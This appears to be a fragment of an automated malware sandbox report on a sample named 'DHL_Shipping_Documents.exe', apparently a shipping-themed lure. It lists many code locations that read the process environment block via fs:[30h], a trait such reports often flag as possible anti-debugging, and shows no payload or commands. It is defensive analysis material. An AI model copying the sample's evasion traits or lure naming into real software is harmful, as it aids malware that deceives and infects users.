Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E255B mov eax, dword ptr fs:[00000030h]	2_2_014E255B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E255B mov eax, dword ptr fs:[00000030h]	2_2_014E255B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155E542 mov eax, dword ptr fs:[00000030h]	2_2_0155E542
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155E542 mov eax, dword ptr fs:[00000030h]	2_2_0155E542
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155C56D mov eax, dword ptr fs:[00000030h]	2_2_0155C56D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014EE577 mov eax, dword ptr fs:[00000030h]	2_2_014EE577
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150651A mov eax, dword ptr fs:[00000030h]	2_2_0150651A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150651A mov eax, dword ptr fs:[00000030h]	2_2_0150651A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150651A mov eax, dword ptr fs:[00000030h]	2_2_0150651A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157450A mov eax, dword ptr fs:[00000030h]	2_2_0157450A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157450A mov eax, dword ptr fs:[00000030h]	2_2_0157450A
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F4511 mov eax, dword ptr fs:[00000030h]	2_2_014F4511
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F4511 mov eax, dword ptr fs:[00000030h]	2_2_014F4511
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01504538 mov eax, dword ptr fs:[00000030h]	2_2_01504538
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D6530 mov eax, dword ptr fs:[00000030h]	2_2_014D6530
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015065D0 mov eax, dword ptr fs:[00000030h]	2_2_015065D0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015125D9 mov eax, dword ptr fs:[00000030h]	2_2_015125D9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E5C8 mov eax, dword ptr fs:[00000030h]	2_2_0154E5C8
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E5C8 mov eax, dword ptr fs:[00000030h]	2_2_0154E5C8
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015085E0 mov eax, dword ptr fs:[00000030h]	2_2_015085E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155C5E2 mov eax, dword ptr fs:[00000030h]	2_2_0155C5E2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D45F0 mov eax, dword ptr fs:[00000030h]	2_2_014D45F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D45F0 mov eax, dword ptr fs:[00000030h]	2_2_014D45F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015585EA mov eax, dword ptr fs:[00000030h]	2_2_015585EA
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A590 mov eax, dword ptr fs:[00000030h]	2_2_0150A590
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A590 mov eax, dword ptr fs:[00000030h]	2_2_0150A590
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D258C mov eax, dword ptr fs:[00000030h]	2_2_014D258C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE597 mov eax, dword ptr fs:[00000030h]	2_2_014FE597
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE597 mov eax, dword ptr fs:[00000030h]	2_2_014FE597
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE597 mov eax, dword ptr fs:[00000030h]	2_2_014FE597
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE597 mov eax, dword ptr fs:[00000030h]	2_2_014FE597
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE597 mov eax, dword ptr fs:[00000030h]	2_2_014FE597
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE597 mov eax, dword ptr fs:[00000030h]	2_2_014FE597
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE597 mov eax, dword ptr fs:[00000030h]	2_2_014FE597
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE597 mov eax, dword ptr fs:[00000030h]	2_2_014FE597
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A0580 mov eax, dword ptr fs:[00000030h]	2_2_015A0580
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014EC590 mov eax, dword ptr fs:[00000030h]	2_2_014EC590
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E58F mov eax, dword ptr fs:[00000030h]	2_2_0150E58F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E58F mov eax, dword ptr fs:[00000030h]	2_2_0150E58F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159A5A4 mov eax, dword ptr fs:[00000030h]	2_2_0159A5A4
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150C5AD mov eax, dword ptr fs:[00000030h]	2_2_0150C5AD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150C5AD mov eax, dword ptr fs:[00000030h]	2_2_0150C5AD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157645E mov eax, dword ptr fs:[00000030h]	2_2_0157645E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01504460 mov ecx, dword ptr fs:[00000030h]	2_2_01504460
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01584460 mov eax, dword ptr fs:[00000030h]	2_2_01584460
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01554415 mov eax, dword ptr fs:[00000030h]	2_2_01554415
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014C640D mov eax, dword ptr fs:[00000030h]	2_2_014C640D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D640B mov eax, dword ptr fs:[00000030h]	2_2_014D640B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E403 mov eax, dword ptr fs:[00000030h]	2_2_0150E403
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E403 mov eax, dword ptr fs:[00000030h]	2_2_0150E403
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E403 mov eax, dword ptr fs:[00000030h]	2_2_0150E403
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E403 mov eax, dword ptr fs:[00000030h]	2_2_0150E403
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E403 mov eax, dword ptr fs:[00000030h]	2_2_0150E403
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E403 mov eax, dword ptr fs:[00000030h]	2_2_0150E403
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E403 mov eax, dword ptr fs:[00000030h]	2_2_0150E403
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150E403 mov eax, dword ptr fs:[00000030h]	2_2_0150E403
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155E42D mov eax, dword ptr fs:[00000030h]	2_2_0155E42D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE4EE mov eax, dword ptr fs:[00000030h]	2_2_014FE4EE
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE4EE mov eax, dword ptr fs:[00000030h]	2_2_014FE4EE
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE4EE mov eax, dword ptr fs:[00000030h]	2_2_014FE4EE
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE4EE mov eax, dword ptr fs:[00000030h]	2_2_014FE4EE
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE4EE mov eax, dword ptr fs:[00000030h]	2_2_014FE4EE
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D24E2 mov eax, dword ptr fs:[00000030h]	2_2_014D24E2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D24E2 mov ecx, dword ptr fs:[00000030h]	2_2_014D24E2
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155C4E0 mov eax, dword ptr fs:[00000030h]	2_2_0155C4E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D0485 mov ecx, dword ptr fs:[00000030h]	2_2_014D0485
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0485 mov eax, dword ptr fs:[00000030h]	2_2_014E0485
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0485 mov eax, dword ptr fs:[00000030h]	2_2_014E0485
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0485 mov eax, dword ptr fs:[00000030h]	2_2_014E0485
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0485 mov eax, dword ptr fs:[00000030h]	2_2_014E0485
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0485 mov eax, dword ptr fs:[00000030h]	2_2_014E0485
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E0485 mov eax, dword ptr fs:[00000030h]	2_2_014E0485
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01550483 mov eax, dword ptr fs:[00000030h]	2_2_01550483
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155E4B1 mov eax, dword ptr fs:[00000030h]	2_2_0155E4B1
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D84B0 mov eax, dword ptr fs:[00000030h]	2_2_014D84B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D84B0 mov eax, dword ptr fs:[00000030h]	2_2_014D84B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D475B mov eax, dword ptr fs:[00000030h]	2_2_014D475B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D475B mov eax, dword ptr fs:[00000030h]	2_2_014D475B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A4740 mov eax, dword ptr fs:[00000030h]	2_2_015A4740
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512710 mov eax, dword ptr fs:[00000030h]	2_2_01512710
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01512710 mov eax, dword ptr fs:[00000030h]	2_2_01512710
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D070F mov eax, dword ptr fs:[00000030h]	2_2_014D070F
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154C732 mov eax, dword ptr fs:[00000030h]	2_2_0154C732
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154C732 mov eax, dword ptr fs:[00000030h]	2_2_0154C732
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0157E730 mov eax, dword ptr fs:[00000030h]	2_2_0157E730
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DC720 mov eax, dword ptr fs:[00000030h]	2_2_014DC720
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F6720 mov eax, dword ptr fs:[00000030h]	2_2_014F6720
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F6720 mov eax, dword ptr fs:[00000030h]	2_2_014F6720
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F273D mov eax, dword ptr fs:[00000030h]	2_2_014F273D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F273D mov eax, dword ptr fs:[00000030h]	2_2_014F273D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F273D mov eax, dword ptr fs:[00000030h]	2_2_014F273D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E7DD mov eax, dword ptr fs:[00000030h]	2_2_0154E7DD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E7DD mov eax, dword ptr fs:[00000030h]	2_2_0154E7DD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E7DD mov eax, dword ptr fs:[00000030h]	2_2_0154E7DD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E7DD mov eax, dword ptr fs:[00000030h]	2_2_0154E7DD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E7DD mov eax, dword ptr fs:[00000030h]	2_2_0154E7DD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E7DD mov eax, dword ptr fs:[00000030h]	2_2_0154E7DD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E7DD mov eax, dword ptr fs:[00000030h]	2_2_0154E7DD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E7DD mov eax, dword ptr fs:[00000030h]	2_2_0154E7DD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154E7DD mov eax, dword ptr fs:[00000030h]	2_2_0154E7DD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A47C0 mov eax, dword ptr fs:[00000030h]	2_2_015A47C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A7F0 mov eax, dword ptr fs:[00000030h]	2_2_0150A7F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D07E7 mov eax, dword ptr fs:[00000030h]	2_2_014D07E7
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015987E8 mov eax, dword ptr fs:[00000030h]	2_2_015987E8
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015987E8 mov eax, dword ptr fs:[00000030h]	2_2_015987E8
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F2785 mov eax, dword ptr fs:[00000030h]	2_2_014F2785
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F2785 mov eax, dword ptr fs:[00000030h]	2_2_014F2785
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F2785 mov eax, dword ptr fs:[00000030h]	2_2_014F2785
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F2785 mov ecx, dword ptr fs:[00000030h]	2_2_014F2785
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F2785 mov eax, dword ptr fs:[00000030h]	2_2_014F2785
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014F2785 mov eax, dword ptr fs:[00000030h]	2_2_014F2785
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E2790 mov ecx, dword ptr fs:[00000030h]	2_2_014E2790
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D47B9 mov eax, dword ptr fs:[00000030h]	2_2_014D47B9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D47B9 mov eax, dword ptr fs:[00000030h]	2_2_014D47B9
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155C64C mov eax, dword ptr fs:[00000030h]	2_2_0155C64C
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01574648 mov eax, dword ptr fs:[00000030h]	2_2_01574648
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01574648 mov eax, dword ptr fs:[00000030h]	2_2_01574648
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01558673 mov esi, dword ptr fs:[00000030h]	2_2_01558673
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01558673 mov eax, dword ptr fs:[00000030h]	2_2_01558673
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01558673 mov eax, dword ptr fs:[00000030h]	2_2_01558673
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01506660 mov eax, dword ptr fs:[00000030h]	2_2_01506660
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150C666 mov eax, dword ptr fs:[00000030h]	2_2_0150C666
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D0670 mov eax, dword ptr fs:[00000030h]	2_2_014D0670
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01550606 mov eax, dword ptr fs:[00000030h]	2_2_01550606
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A4600 mov eax, dword ptr fs:[00000030h]	2_2_015A4600
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0156860B mov eax, dword ptr fs:[00000030h]	2_2_0156860B
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A620 mov eax, dword ptr fs:[00000030h]	2_2_0150A620
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A620 mov eax, dword ptr fs:[00000030h]	2_2_0150A620
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01502624 mov eax, dword ptr fs:[00000030h]	2_2_01502624
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014E06C0 mov eax, dword ptr fs:[00000030h]	2_2_014E06C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015006C0 mov eax, dword ptr fs:[00000030h]	2_2_015006C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150C6C0 mov eax, dword ptr fs:[00000030h]	2_2_0150C6C0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D86D0 mov eax, dword ptr fs:[00000030h]	2_2_014D86D0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015066FD mov esi, dword ptr fs:[00000030h]	2_2_015066FD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015066FD mov eax, dword ptr fs:[00000030h]	2_2_015066FD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015066FD mov eax, dword ptr fs:[00000030h]	2_2_015066FD
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150C6E0 mov eax, dword ptr fs:[00000030h]	2_2_0150C6E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150C6E0 mov eax, dword ptr fs:[00000030h]	2_2_0150C6E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155C6E1 mov eax, dword ptr fs:[00000030h]	2_2_0155C6E1
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015026EC mov eax, dword ptr fs:[00000030h]	2_2_015026EC
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015026EC mov ecx, dword ptr fs:[00000030h]	2_2_015026EC
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015026EC mov eax, dword ptr fs:[00000030h]	2_2_015026EC
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0159A693 mov eax, dword ptr fs:[00000030h]	2_2_0159A693
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A687 mov ebx, dword ptr fs:[00000030h]	2_2_0150A687
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150A687 mov eax, dword ptr fs:[00000030h]	2_2_0150A687
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0155E6B0 mov eax, dword ptr fs:[00000030h]	2_2_0155E6B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015666A0 mov eax, dword ptr fs:[00000030h]	2_2_015666A0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D06B0 mov eax, dword ptr fs:[00000030h]	2_2_014D06B0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154C960 mov ecx, dword ptr fs:[00000030h]	2_2_0154C960
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154C960 mov eax, dword ptr fs:[00000030h]	2_2_0154C960
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154C960 mov eax, dword ptr fs:[00000030h]	2_2_0154C960
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0154C960 mov eax, dword ptr fs:[00000030h]	2_2_0154C960
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D090D mov eax, dword ptr fs:[00000030h]	2_2_014D090D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014D090D mov eax, dword ptr fs:[00000030h]	2_2_014D090D
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01574904 mov eax, dword ptr fs:[00000030h]	2_2_01574904
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01574904 mov eax, dword ptr fs:[00000030h]	2_2_01574904
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01574904 mov eax, dword ptr fs:[00000030h]	2_2_01574904
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01574904 mov eax, dword ptr fs:[00000030h]	2_2_01574904
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01574904 mov eax, dword ptr fs:[00000030h]	2_2_01574904
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01574904 mov eax, dword ptr fs:[00000030h]	2_2_01574904
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_01574904 mov ecx, dword ptr fs:[00000030h]	2_2_01574904
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0156C900 mov eax, dword ptr fs:[00000030h]	2_2_0156C900
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0156C900 mov eax, dword ptr fs:[00000030h]	2_2_0156C900
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA930 mov eax, dword ptr fs:[00000030h]	2_2_014DA930
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA930 mov eax, dword ptr fs:[00000030h]	2_2_014DA930
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA930 mov eax, dword ptr fs:[00000030h]	2_2_014DA930
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA930 mov eax, dword ptr fs:[00000030h]	2_2_014DA930
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA930 mov eax, dword ptr fs:[00000030h]	2_2_014DA930
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DA930 mov eax, dword ptr fs:[00000030h]	2_2_014DA930
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0151092E mov eax, dword ptr fs:[00000030h]	2_2_0151092E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0151092E mov edx, dword ptr fs:[00000030h]	2_2_0151092E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0151092E mov eax, dword ptr fs:[00000030h]	2_2_0151092E
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015889D0 mov eax, dword ptr fs:[00000030h]	2_2_015889D0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015889D0 mov eax, dword ptr fs:[00000030h]	2_2_015889D0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014FE9DE mov eax, dword ptr fs:[00000030h]	2_2_014FE9DE
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150C9F8 mov eax, dword ptr fs:[00000030h]	2_2_0150C9F8
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_015A49F0 mov eax, dword ptr fs:[00000030h]	2_2_015A49F0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DE9E0 mov eax, dword ptr fs:[00000030h]	2_2_014DE9E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DE9E0 mov eax, dword ptr fs:[00000030h]	2_2_014DE9E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DE9E0 mov eax, dword ptr fs:[00000030h]	2_2_014DE9E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DE9E0 mov eax, dword ptr fs:[00000030h]	2_2_014DE9E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DE9E0 mov eax, dword ptr fs:[00000030h]	2_2_014DE9E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DE9E0 mov eax, dword ptr fs:[00000030h]	2_2_014DE9E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DE9E0 mov eax, dword ptr fs:[00000030h]	2_2_014DE9E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DE9E0 mov eax, dword ptr fs:[00000030h]	2_2_014DE9E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_014DE9E0 mov eax, dword ptr fs:[00000030h]	2_2_014DE9E0
Source: C:\Users\user\Desktop\DHL_Shipping_Documents.exe	Code function: 2_2_0150C9E4 mov eax, dword ptr fs:[00000030h]	2_2_0150C9E4
